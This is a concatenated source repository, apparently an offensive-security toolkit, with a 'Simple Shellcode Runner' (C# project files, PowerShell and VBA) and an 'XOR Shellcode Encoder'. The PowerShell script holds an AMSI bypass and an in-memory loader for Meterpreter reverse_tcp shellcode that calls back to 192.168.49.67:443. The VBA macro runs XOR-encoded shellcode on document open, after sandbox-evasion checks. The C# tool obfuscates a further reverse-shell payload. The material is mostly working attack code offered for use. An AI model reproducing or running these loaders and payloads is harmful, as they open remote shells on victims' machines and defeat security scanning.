[assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1659e645-27b0-4ab9-a10e-64ba4b801cb0")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0} 8 | Exe 9 | Simple_Shellcode_Runner 10 | Simple Shellcode Runner 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | true 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | true 36 | 37 | 38 | true 39 | bin\x64\Debug\ 40 | DEBUG;TRACE 41 | true 42 | full 43 | x64 44 | 7.3 45 | prompt 46 | true 47 | 48 | 49 | bin\x64\Release\ 50 | TRACE 51 | true 52 | true 53 | pdbonly 54 | x64 55 | 7.3 56 | prompt 57 | true 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.ps1: -------------------------------------------------------------------------------- 1 | # Compact AMSI bypass 2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true) 3 | 4 | # Shellcode loader >:] 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 13 | @($moduleName)), $functionName)) 14 | } 15 | 16 | function getDelegateType { 17 | Param ( 18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 19 | [Parameter(Position = 1)] [Type] $delType = [Void] 20 | ) 21 | $type = [AppDomain]::CurrentDomain. 22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 24 | DefineDynamicModule('InMemoryModule', $false). 25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 26 | [System.MulticastDelegate]) 27 | $type. 28 | DefineConstructor('RTSpecialName, HideBySig, Public', 29 | [System.Reflection.CallingConventions]::Standard, $func). 30 | SetImplementationFlags('Runtime, Managed') 31 | $type. 32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 33 | SetImplementationFlags('Runtime, Managed') 34 | return $type.CreateType() 35 | } 36 | 37 | # Allocate executable memory 38 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), 39 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40) 40 | 41 | # Copy shellcode to allocated memory 42 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell 43 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0x50,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x48,0x1,0xd0,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5 44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length) 45 | 46 | # Execute shellcode and wait for it to exit 47 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), 48 | (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero) 49 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), 50 | (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF) -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple Shellcode Runner", "Simple Shellcode Runner.csproj", "{1659E645-27B0-4AB9-A10E-64BA4B801CB0}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.ActiveCfg = Release|x64 17 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}.Release|Any CPU.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {AD661BF8-44C4-4DF0-8EF0-6B38C519DD39} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Simple Shellcode Runner/Simple Shellcode Runner.vba: -------------------------------------------------------------------------------- 1 | Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal mili As Long) As Long 2 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr 3 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 4 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal destAddr As LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr 5 | Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr 6 | Sub LegitMacro() 7 | Dim allocRes As LongPtr 8 | Dim t1 As Date 9 | Dim t2 As Date 10 | Dim time As Long 11 | Dim buf As Variant 12 | Dim addr As LongPtr 13 | Dim counter As Long 14 | Dim data As Long 15 | Dim res As LongPtr 16 | 17 | ' Call FlsAlloc and verify if the result exists 18 | allocRes = FlsAlloc(0) 19 | If IsNull(allocRes) Then 20 | End 21 | End If 22 | 23 | ' Sleep for 10 seconds and verify time passed 24 | t1 = Now() 25 | Sleep (10000) 26 | t2 = Now() 27 | time = DateDiff("s", t1, t2) 28 | If time < 10 Then 29 | Exit Sub 30 | End If 31 | 32 | ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool) 33 | buf = Array(6, 178, 121, 30, 10, 18, 54, 250, 250, 250, 187, 171, 187, 170, 168, 178, 203, 40, 159, 178, 113, 168, 154, 171, 178, 113, 168, 226, 178, 113, 168, 218, 172, 178, 245, 77, 176, 176, 178, 113, 136, 170, 183, 203, 51, 178, 203, 58, 86, 198, 155, _ 34 | 134, 248, 214, 218, 187, 59, 51, 247, 187, 251, 59, 24, 23, 168, 178, 113, 168, 218, 187, 171, 113, 184, 198, 178, 251, 42, 156, 123, 130, 226, 241, 248, 245, 127, 136, 250, 250, 250, 113, 122, 114, 250, 250, 250, 178, 127, 58, 142, 157, 178, _ 35 | 251, 42, 190, 113, 186, 218, 179, 251, 42, 170, 113, 178, 226, 25, 172, 183, 203, 51, 178, 5, 51, 187, 113, 206, 114, 178, 251, 44, 178, 203, 58, 187, 59, 51, 247, 86, 187, 251, 59, 194, 26, 143, 11, 182, 249, 182, 222, 242, 191, 195, _ 36 | 43, 143, 34, 162, 190, 113, 186, 222, 179, 251, 42, 156, 187, 113, 246, 178, 190, 113, 186, 230, 179, 251, 42, 187, 113, 254, 114, 178, 251, 42, 187, 162, 187, 162, 164, 163, 160, 187, 162, 187, 163, 187, 160, 178, 121, 22, 218, 187, 168, 5, _ 37 | 26, 162, 187, 163, 160, 178, 113, 232, 19, 177, 5, 5, 5, 167, 179, 68, 141, 137, 200, 165, 201, 200, 250, 250, 187, 172, 179, 115, 28, 178, 123, 22, 90, 251, 250, 250, 179, 115, 31, 179, 70, 248, 250, 251, 65, 58, 82, 203, 185, 187, _ 38 | 174, 179, 115, 30, 182, 115, 11, 187, 64, 182, 141, 220, 253, 5, 47, 182, 115, 16, 146, 251, 251, 250, 250, 163, 187, 64, 211, 122, 145, 250, 5, 47, 144, 240, 187, 164, 170, 170, 183, 203, 51, 183, 203, 58, 178, 5, 58, 178, 115, 56, _ 39 | 178, 5, 58, 178, 115, 59, 187, 64, 16, 245, 37, 26, 5, 47, 178, 115, 61, 144, 234, 187, 162, 182, 115, 24, 178, 115, 3, 187, 64, 99, 95, 142, 155, 5, 47, 127, 58, 142, 240, 179, 5, 52, 143, 31, 18, 105, 250, 250, 250, 178, _ 40 | 121, 22, 234, 178, 115, 24, 183, 203, 51, 144, 254, 187, 162, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 132, 175, 178, 121, 62, 218, 164, 115, 12, 144, 186, 187, 163, 146, 250, 234, 250, 250, 187, 162, 178, 115, 8, _ 41 | 178, 203, 51, 187, 64, 162, 94, 169, 31, 5, 47, 178, 115, 57, 179, 115, 61, 183, 203, 51, 179, 115, 10, 178, 115, 32, 178, 115, 3, 187, 64, 248, 35, 50, 165, 5, 47, 121, 2, 250, 135, 210, 162, 187, 173, 163, 146, 250, 186, 250, _ 42 | 250, 187, 162, 144, 250, 160, 187, 64, 241, 213, 245, 202, 5, 47, 173, 163, 187, 64, 143, 148, 183, 155, 5, 47, 179, 5, 52, 19, 198, 5, 5, 5, 178, 251, 57, 178, 211, 60, 178, 127, 12, 143, 78, 187, 5, 29, 162, 144, 250, 163, _ 43 | 65, 26, 231, 208, 240, 187, 115, 32, 5, 47) 44 | 45 | ' Allocate memory space 46 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 47 | 48 | ' Decode the shellcode 49 | For i = 0 To UBound(buf) 50 | buf(i) = buf(i) Xor 250 51 | Next i 52 | 53 | ' Move the shellcode 54 | For counter = LBound(buf) To UBound(buf) 55 | data = buf(counter) 56 | res = RtlMoveMemory(addr + counter, data, 1) 57 | Next counter 58 | 59 | ' Execute the shellcode 60 | res = CreateThread(0, 0, addr, 0, 0, 0) 61 | End Sub 62 | Sub Document_Open() 63 | MyMacro 64 | End Sub 65 | Sub AutoOpen() 66 | MyMacro 67 | End Sub 68 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace XorCoder 8 | { 9 | public class Program 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[511] { 15 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 16 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 17 | 0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a, 18 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 19 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 20 | 0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b, 21 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48, 22 | 0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48, 23 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9, 24 | 0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45, 25 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b, 26 | 0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58, 27 | 0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48, 28 | 0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9, 29 | 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00, 30 | 0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5, 31 | 0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xe8,0x85,0x41,0x54,0x49,0x89,0xe4, 32 | 0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68, 33 | 0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a, 34 | 0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89, 35 | 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5, 36 | 0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba, 37 | 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5, 38 | 0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9, 39 | 0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 40 | 0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41, 41 | 0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41, 42 | 0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31, 43 | 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8, 44 | 0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40, 45 | 0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 46 | 0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c, 47 | 0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41, 48 | 0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff, 49 | 0xd5 }; 50 | 51 | // Encode the payload with XOR (fixed key) 52 | byte[] encoded = new byte[buf.Length]; 53 | for (int i = 0; i < buf.Length; i++) 54 | { 55 | encoded[i] = (byte)((uint)buf[i] ^ 0xfa); 56 | } 57 | 58 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 59 | int totalCount = encoded.Length; 60 | for (int count = 0; count < totalCount; count++) 61 | { 62 | byte b = encoded[count]; 63 | 64 | if ((count + 1) == totalCount) // Dont append comma for last item 65 | { 66 | hex.AppendFormat("0x{0:x2}", b); 67 | } 68 | else 69 | { 70 | hex.AppendFormat("0x{0:x2}, ", b); 71 | } 72 | 73 | if ((count + 1) % 15 == 0) 74 | { 75 | hex.Append("\n"); 76 | } 77 | } 78 | 79 | Console.WriteLine($"XOR payload (key: 0xfa):"); 80 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 81 | 82 | //// Decode the XOR payload 83 | //for (int i = 0; i < buf.Length; i++) 84 | //{ 85 | // buf[i] = (byte)((uint)buf[i] ^ 0xfa); 86 | //} 87 | 88 | } 89 | } 90 | } -------------------------------------------------------------------------------- /XOR Shellcode Encoder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("XOR Shellcode Encoder")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("XOR Shellcode Encoder")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("ee64b207-d973-489b-84a8-b718b93e039b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/XOR Shellcode Encoder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {EE64B207-D973-489B-84A8-B718B93E039B} 8 | Exe 9 | XOR_Shellcode_Encoder 10 | XOR Shellcode Encoder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/XOR Shellcode Encoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XOR Shellcode Encoder", "XOR Shellcode Encoder.csproj", "{EE64B207-D973-489B-84A8-B718B93E039B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {AB26D59A-5BB7-41F5-969C-46504DCF0D8F} 24 | EndGlobalSection 25 | EndGlobal 26 | --------------------------------------------------------------------------------